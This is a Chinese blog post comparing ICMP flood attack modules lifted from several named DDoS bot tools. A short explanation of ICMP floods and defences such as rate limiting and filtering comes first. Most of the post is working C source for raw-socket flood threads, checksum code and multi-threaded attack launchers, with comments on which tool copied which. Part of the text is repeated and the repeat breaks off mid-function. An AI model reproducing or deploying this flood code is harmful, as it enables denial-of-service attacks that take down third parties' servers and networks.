对现有的所能找到的DDOS代码(攻击模块)做出一次分析----ICMP篇
2015-09-27 16:56
405 查看
分析者:alalmn—飞龙 BLOG:http://hi.baidu.com/alalmn
分析的不好请各位高手见谅花了几个小时分析的呵呵
ICMP洪水攻击从代码中我们可以看出都是 自定义ICMP首部 然后进行快速的发送
ICMP洪水攻击(实用于大带宽服务器)
操作系统规定的ICMP数据包最大尺寸不超过64KB这一规定
如果ICMP数据包的尺寸超过64KB上限时,主机就会出现内存分配错误,导致TCP/IP堆栈崩溃,致使主机死机。(现在的操作系统已经限制了发送ICMP数据包的大小,解决了这个漏洞)
此外,向目标主机长时间、连续、大量地发送ICMP数据包,也会最终使系统瘫痪。大量的ICMP数据包会形成“ICMP风暴”,使得目标主机耗费大量的CPU资源处理,疲于奔命。
防范方法
第一种方法是在路由器上对ICMP数据包进行带宽限制,将ICMP占用的带宽控制在一定的范围内,这样即使有ICMP攻击,它所占用的带宽也是非常有限的,对整个网络的影响非常少;
第二种方法就是在主机上设置ICMP数据包的处理规则,最好是设定拒绝所有的ICMP数据包。
设置ICMP数据包处理规则的方法也有两种,一种是在操作系统上设置包过滤,另一种是在主机上安装防火墙。具体设置如下:
//=================================================================================
冷风的.h
/*ICMP Header*/
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
/****************ICMP FLOOD*******************************/
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data; //填写相应icmp头结构 然后发送
icmp_hdr->i_type = ICMP_ECHO; //告之所发送的是探测主机类型的icmp 即ping
icmp_hdr->i_code = 0; //发送默认
icmp_hdr->i_id = (USHORT)GetCurrentProcessId(); //自己的id //GetCurrentProcessID 得到当前进程的ID
icmp_hdr->i_cksum = 0; //发送包 //代码
icmp_hdr->i_seq = 0;//序列
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer)); //复制内存
}
unsigned long CALLBACK icmp_flood(LPVOID dParam) //ICMP攻击
{
SOCKET m_hSocket; //套接字
SOCKADDR_IN m_addrDest; //IP信息结构
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
return 0;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return 0;
memset(&m_addrDest, 0, sizeof(m_addrDest)); //内存空间初始化
m_addrDest.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
m_addrDest.sin_addr.S_un.S_addr=resolve(DdosUrl); //网络地址 被攻击者的IP
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET); //分配内存
memset(icmp_data,0,MAX_PACKET); //内存空间初始化
fill_icmp_data(icmp_data,MAX_PACKET); //填写相应icmp头结构 然后发送
int seq_no=0;
while(!StopDDosAttack) //是否在攻击状态
{
((ICMP_HEADER*)icmp_data)->i_cksum = 0; //发送包 //代码
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;//序列 //攻击次数自+1
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); //时间戳
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);//发送包 //代码
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest)); //向一指定目的地发送数据
if (seq_no>=65534) //攻击次数
seq_no=1;
Sleep(100); //暂停(毫秒)
}
return 0;
}
//=================================================================================
Maxer.h
/*ICMP Header*/
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
//ICMP攻击
DWORD WINAPI IcmpFlood(LPVOID dParam)
{
PDDOSINFO pddosinfo = (PDDOSINFO)dParam; //攻击结构体
DDOSINFO ddosinfo; //攻击结构体
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));//复制内存
WSADATA wsaData;//这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2, 2), &wsaData);//确定SOCKET版本
SOCKET m_hSocket;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
return 0;
int timeout = 3000;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return 0;
SOCKADDR_IN m_sockaddr;//IP信息结构
m_sockaddr.sin_family=AF_INET;//sin_family 地址家族(必须是AF_INET)
m_sockaddr.sin_addr.s_addr=inet_addr(ddosinfo.addr);//IP地址
ICMP_HEADER icmp_header;//icmp头结构
icmp_header.i_code=0;//发送默认
icmp_header.i_id=2; //自己的id
icmp_header.i_cksum=0; //发送包 //代码
icmp_header.i_seq=512;//序列
icmp_header.i_type=8; //告之所发送的是探测主机类型的icmp 即ping
icmp_header.timestamp=GetTickCount(); //时间戳 GetTickCount()从操作系统启动到现在所经过(elapsed)的毫秒数,它的返回值是DWORD。
char Buffer[1024];
memcpy(Buffer,&icmp_header,sizeof(icmp_header)); //复制
memset(Buffer+sizeof(icmp_header),'I',1024); //内存空间初始化
int icmpsize=sizeof(Buffer)+sizeof(icmp_header);
while(1)
{
if(IsStop==1)//是否在攻击状态
{
ExitThread(0);
return 0;
}
for(int a=0;a<10;a++) //攻击次数 才攻击10次是不是太少了
sendto(m_hSocket,Buffer,icmpsize,0,(struct sockaddr *)&m_sockaddr,sizeof(m_sockaddr)); //向一指定目的地发送数据
}
return 0;
}
//=================================================================================
NetBot_Attacker.h
//大家看这个是不是跟 冷风的.h 代码一样呢呵呵 我认为是冷风抄袭NB的呵呵应为NB这个写的早冷风给我的时候比较晚
//冷风给我的时候 NB的这个代码还没发布呢 说明NB早就给冷风了
//在这里就不注释了
/*ICMP Header*/
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
/****************ICMP FLOOD*******************************/
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}
unsigned long CALLBACK icmp_flood(LPVOID dParam)
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData); //判断SOCKET版本 冷风的.h 没做
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);
if (m_hSocket == INVALID_SOCKET)
return 0;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
return 0;
memset(&m_addrDest, 0, sizeof(m_addrDest));
m_addrDest.sin_family = AF_INET;
m_addrDest.sin_addr.S_un.S_addr=resolve(fuckweb.FuckIP);
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data,MAX_PACKET);
int seq_no=0;
while(!stopfuck)
{
((ICMP_HEADER*)icmp_data)->i_cksum = 0;
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));
if (seq_no>=65534)
seq_no=1;
Sleep(40);
}
return 0;
}
//=================================================================================
暴风DDOS.h
#define ICMP_ECHO 8
#define MAX_PACKET 4096
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}
void icmp_flood()
{
Sleep(2000);
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData); //COCKET版本
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest; //IP信息结构
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return;
memset(&m_addrDest, 0, sizeof(m_addrDest)); //内存空间初始化
m_addrDest.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
{ //inet_addr将ip地址转换成网络地址 INADDR_NONE非法地址
struct hostent *hp = NULL; //hostent IP信息结构体
if ((hp = gethostbyname(tgtIP)) != NULL) //gethostbyname主机信息
{
memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length); //复制内存
m_addrDest.sin_family = hp->h_addrtype;
}
else
return;
}
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET); //分配内存
memset(icmp_data,0,MAX_PACKET); //内存空间初始化
fill_icmp_data(icmp_data,MAX_PACKET); //填写相应icmp头结构 然后发送
int seq_no=0;
int sleep_time = SleepTime/10; //这个值好像没有用到啊
while(1)
{
if (StopFlag == 1)//是否在攻击状态
{
ExitThread(0);
return;
}
((ICMP_HEADER*)icmp_data)->i_cksum = 0;//发送包 //代码
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;//序列 //攻击次数自+1
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); //时间戳
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);//发送包 //代码
for (int i=0;i<100;i++) //循环攻击100次
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest)); //向一指定目的地发送数据
Sleep(5); //暂停(毫秒)
}
return;
}
void StartICMP(char ip[30],int port,int time,int xc)
{
if (inet_addr(ip)== INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(ip)) != NULL)
{
in_addr in;
memcpy(&in, hp->h_addr, hp->h_length);
strcpy(tgtIP,inet_ntoa(in));
}
}
else
strcpy(tgtIP,ip);
port=tgtPort;
time=timeout;
if (StopFlag == -1)
return;
StopFlag=-1;
for(i=0;i<xc;i++)
{
h=CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmp_flood,NULL,0,NULL);
}
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}
//==================== ================================
暴风DDOSVIP2010-225源代码.h
/*-----------------------------ICMP data-----------------------------------------------*/
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
void icmpattack()
{
WSADATA wsaData; //这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2, 2), &wsaData); //确定SOCKET版本
SOCKET m_hSocket;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return;
SOCKADDR_IN m_sockaddr; //IP信息结构
m_sockaddr.sin_family=AF_INET; //sin_family 地址家族(必须是AF_INET)
m_sockaddr.sin_addr.s_addr=inet_addr(tgtIP); //攻击IP
ICMP_HEADER icmp_header;//icmp头结构
icmp_header.i_code=0;//发送默认
icmp_header.i_id=2; //自己的id
icmp_header.i_cksum=0; //发送包 //代码
icmp_header.i_seq=512;//序列
icmp_header.i_type=8; //告之所发送的是探测主机类型的icmp 即ping
icmp_header.timestamp=GetTickCount();//时间戳
char Buffer[1024];
memcpy(Buffer,&icmp_header,sizeof(icmp_header)); //复制
memset(Buffer+sizeof(icmp_header),'I',1024); //内存空间初始化 初始化攻击数据
int icmpsize=sizeof(Buffer)+sizeof(icmp_header);
while(1)
{
if(StopFlag==1)//是否在攻击状态
{
ExitThread(0);
return;
}
for(int a=0;a<10;a++) //攻击次数
sendto(m_hSocket,Buffer,icmpsize,0,(struct sockaddr *)&m_sockaddr,sizeof(m_sockaddr)); //向一指定目的地发送数据
}
WSACleanup(); //中止Windows Sockets DLL的使用
return;
}
void StartICMP(char ip[30],int port,int time,int xc)
{
if (inet_addr(ip)== INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(ip)) != NULL)
{
in_addr in;
memcpy(&in, hp->h_addr, hp->h_length);
strcpy(tgtIP,inet_ntoa(in));
}
}
else
strcpy(tgtIP,ip);
tgtPort=port;
timeout=time;
if (StopFlag == -1)
return;
StopFlag=-1;
for(z=0;z<xc;z++)
{
h[z]=CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmpattack,NULL,0,NULL);
}
if(timeout!=0)
{
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);
}
}
//================ ===================================
分布式DDOS.h
struct ICMPHeader //24bytes
{
unsigned char type;
unsigned char code;
unsigned short checksum;
unsigned short ProcessID;
unsigned short Seq;
char data[16];
};
//initialize ICMP packet
void InitICMPPacket(ICMPHeader* p)
{
p->type=8; //告之所发送的是探测主机类型的icmp 即ping
p->code=0;//发送默认
p->ProcessID=(unsigned short)GetCurrentProcessId(); //自己的id GetCurrentProcessId()进程ID
p->Seq=0;//序列
char buf[]="Attack you!";
strcpy(p->data,buf); //发送数据内容
unsigned long ulSum=0;
unsigned short *pBuf=(unsigned short *)p;
int size=sizeof(ICMPHeader);
int index=0;
for(;size > 1;size -= 2,index++)
ulSum += pBuf[index];
if(size != 0) ulSum += pBuf[index];
ulSum = (ulSum>>16) + (ulSum&0xffff);
ulSum += (ulSum>>16);
p->checksum = (unsigned short)(~ulSum);
}
UINT CDDOSClientDlg::AttackThread(void* param)
{
CDDOSClientDlg *p = (CDDOSClientDlg *)param;
SOCKET att_sock = socket(PF_INET,SOCK_DGRAM,IPPROTO_UDP); //创建socket UDP模式
SOCKADDR_IN att_addr; //IP信息结构
att_addr.sin_family = PF_INET; //sin_family 地址家族(必须是AF_INET)
att_addr.sin_addr.s_addr = inet_addr(p->att_head.ip); //inet_addr将ip地址转换成网络地址
ICMPHeader packet;
InitICMPPacket(&packet); //填充ICMP首部
while(p->isAttacking)
{
sendto(att_sock,(char *)&packet,sizeof(ICMPHeader),0,(sockaddr *)&att_addr,sizeof(SOCKADDR_IN)); //向一指定目的地发送数据
//Sleep(1000);
}
return 0;
}
//======================= ==========================
盘古1.5代码.h
//这里我们可以看到和 暴风DDOS.h 是一样的所以我们不介绍了
//暴风DDOS(前几个版本) 的攻击模块是使用盘古的
/////////////ICMP 攻击
/*ICMP Header*/
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
#define ICMP_ECHO 8
#define MAX_PACKET 4096
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}
void icmp_flood() //ICMP攻击
{
Sleep(2000);
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);
if (m_hSocket == INVALID_SOCKET)
return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
return;
memset(&m_addrDest, 0, sizeof(m_addrDest));
m_addrDest.sin_family = AF_INET;
//sin_family 地址家族(必须是AF_INET)
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
//inet_addr将ip地址转换成网络地址 IP地址不正确返回INADDR_NONE
{
struct hostent *hp = NULL; //hostent域名转换成IP
if ((hp = gethostbyname(tgtIP)) != NULL)
//gethostbyname主机信息 tgtIPIP地址 != NULL不等于空
{
memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);
//hp->h_length表示的是主机ip地址的长度
m_addrDest.sin_family = hp->h_addrtype;
//hp->h_addrtype主机ip地址的类型是ipv4(AF_INET)还是ipv6(AF_INET6)
}
else
return;
}
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data,MAX_PACKET); //填充ICMP首部
int seq_no=0;
int sleep_time = SleepTime/10; //并没有使用到
while(1)
{
if (StopFlag == 1) //StopFlag= 1; 表示没有在攻击
{
ExitThread(0);
return;
}
((ICMP_HEADER*)icmp_data)->i_cksum = 0;
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
for (int i=0;i<100;i++)
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));
Sleep(5);
}
return;
}
/////////////////ICMP攻击结束
//================== ===============================
盘古DDOS优化版.h
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
#define ICMP_ECHO 8
#define MAX_PACKET 4096
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size )
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
///ICMP
char icmpBuffer[256]="啊啊啊啊啊"; //攻击数据
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer)); //复制攻击数据
}
void icmpflood()
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return;
memset(&m_addrDest, 0, sizeof(m_addrDest)); //内存空间初始化
m_addrDest.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtip)) == INADDR_NONE) //网络地址 被攻击者的IP
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(tgtip)) != NULL)
{
memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length);
m_addrDest.sin_family = hp->h_addrtype;
}
else
return;
}
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
//HeapAlloc分配内存
memset(icmp_data,0,MAX_PACKET); //内存空间初始化
fill_icmp_data(icmp_data,MAX_PACKET); //填写相应icmp头结构
int seq_no=0;
while(1)
{
if (Stop == 1)
{
ExitThread(0);
return;
}
((ICMP_HEADER*)icmp_data)->i_cksum = 0; //发送包 //代码
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;//序列 //攻击次数自+1
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); //时间戳
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);//发送包 //代码
for (int i=0;i<1000;i++)
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest)); //向一指定目的地发送数据
Sleep(20);
}
return;
}
//===================================================== ===
分析的不好请各位高手见谅花了几个小时分析的呵呵
ICMP洪水攻击从代码中我们可以看出都是 自定义ICMP首部 然后进行快速的发送
ICMP洪水攻击(实用于大带宽服务器)
操作系统规定的ICMP数据包最大尺寸不超过64KB这一规定
如果ICMP数据包的尺寸超过64KB上限时,主机就会出现内存分配错误,导致TCP/IP堆栈崩溃,致使主机死机。(现在的操作系统已经限制了发送ICMP数据包的大小,解决了这个漏洞)
此外,向目标主机长时间、连续、大量地发送ICMP数据包,也会最终使系统瘫痪。大量的ICMP数据包会形成“ICMP风暴”,使得目标主机耗费大量的CPU资源处理,疲于奔命。
防范方法
第一种方法是在路由器上对ICMP数据包进行带宽限制,将ICMP占用的带宽控制在一定的范围内,这样即使有ICMP攻击,它所占用的带宽也是非常有限的,对整个网络的影响非常少;
第二种方法就是在主机上设置ICMP数据包的处理规则,最好是设定拒绝所有的ICMP数据包。
设置ICMP数据包处理规则的方法也有两种,一种是在操作系统上设置包过滤,另一种是在主机上安装防火墙。具体设置如下:
//=================================================================================
冷风的.h
/*ICMP Header*/
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
/****************ICMP FLOOD*******************************/
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data; //填写相应icmp头结构 然后发送
icmp_hdr->i_type = ICMP_ECHO; //告之所发送的是探测主机类型的icmp 即ping
icmp_hdr->i_code = 0; //发送默认
icmp_hdr->i_id = (USHORT)GetCurrentProcessId(); //自己的id //GetCurrentProcessID 得到当前进程的ID
icmp_hdr->i_cksum = 0; //发送包 //代码
icmp_hdr->i_seq = 0;//序列
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer)); //复制内存
}
unsigned long CALLBACK icmp_flood(LPVOID dParam) //ICMP攻击
{
SOCKET m_hSocket; //套接字
SOCKADDR_IN m_addrDest; //IP信息结构
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
return 0;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return 0;
memset(&m_addrDest, 0, sizeof(m_addrDest)); //内存空间初始化
m_addrDest.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
m_addrDest.sin_addr.S_un.S_addr=resolve(DdosUrl); //网络地址 被攻击者的IP
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET); //分配内存
memset(icmp_data,0,MAX_PACKET); //内存空间初始化
fill_icmp_data(icmp_data,MAX_PACKET); //填写相应icmp头结构 然后发送
int seq_no=0;
while(!StopDDosAttack) //是否在攻击状态
{
((ICMP_HEADER*)icmp_data)->i_cksum = 0; //发送包 //代码
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;//序列 //攻击次数自+1
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); //时间戳
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);//发送包 //代码
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest)); //向一指定目的地发送数据
if (seq_no>=65534) //攻击次数
seq_no=1;
Sleep(100); //暂停(毫秒)
}
return 0;
}
//=================================================================================
Maxer.h
/*ICMP Header*/
typedef struct _icmphdr //定义ICMP首部
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
//ICMP攻击
DWORD WINAPI IcmpFlood(LPVOID dParam)
{
PDDOSINFO pddosinfo = (PDDOSINFO)dParam; //攻击结构体
DDOSINFO ddosinfo; //攻击结构体
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));//复制内存
WSADATA wsaData;//这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2, 2), &wsaData);//确定SOCKET版本
SOCKET m_hSocket;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); //创建一个与指定传送服务提供者捆绑的套接口
if (m_hSocket == INVALID_SOCKET) //INVALID_SOCKET发生错误
return 0;
int timeout = 3000;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
return 0;
SOCKADDR_IN m_sockaddr;//IP信息结构
m_sockaddr.sin_family=AF_INET;//sin_family 地址家族(必须是AF_INET)
m_sockaddr.sin_addr.s_addr=inet_addr(ddosinfo.addr);//IP地址
ICMP_HEADER icmp_header;//icmp头结构
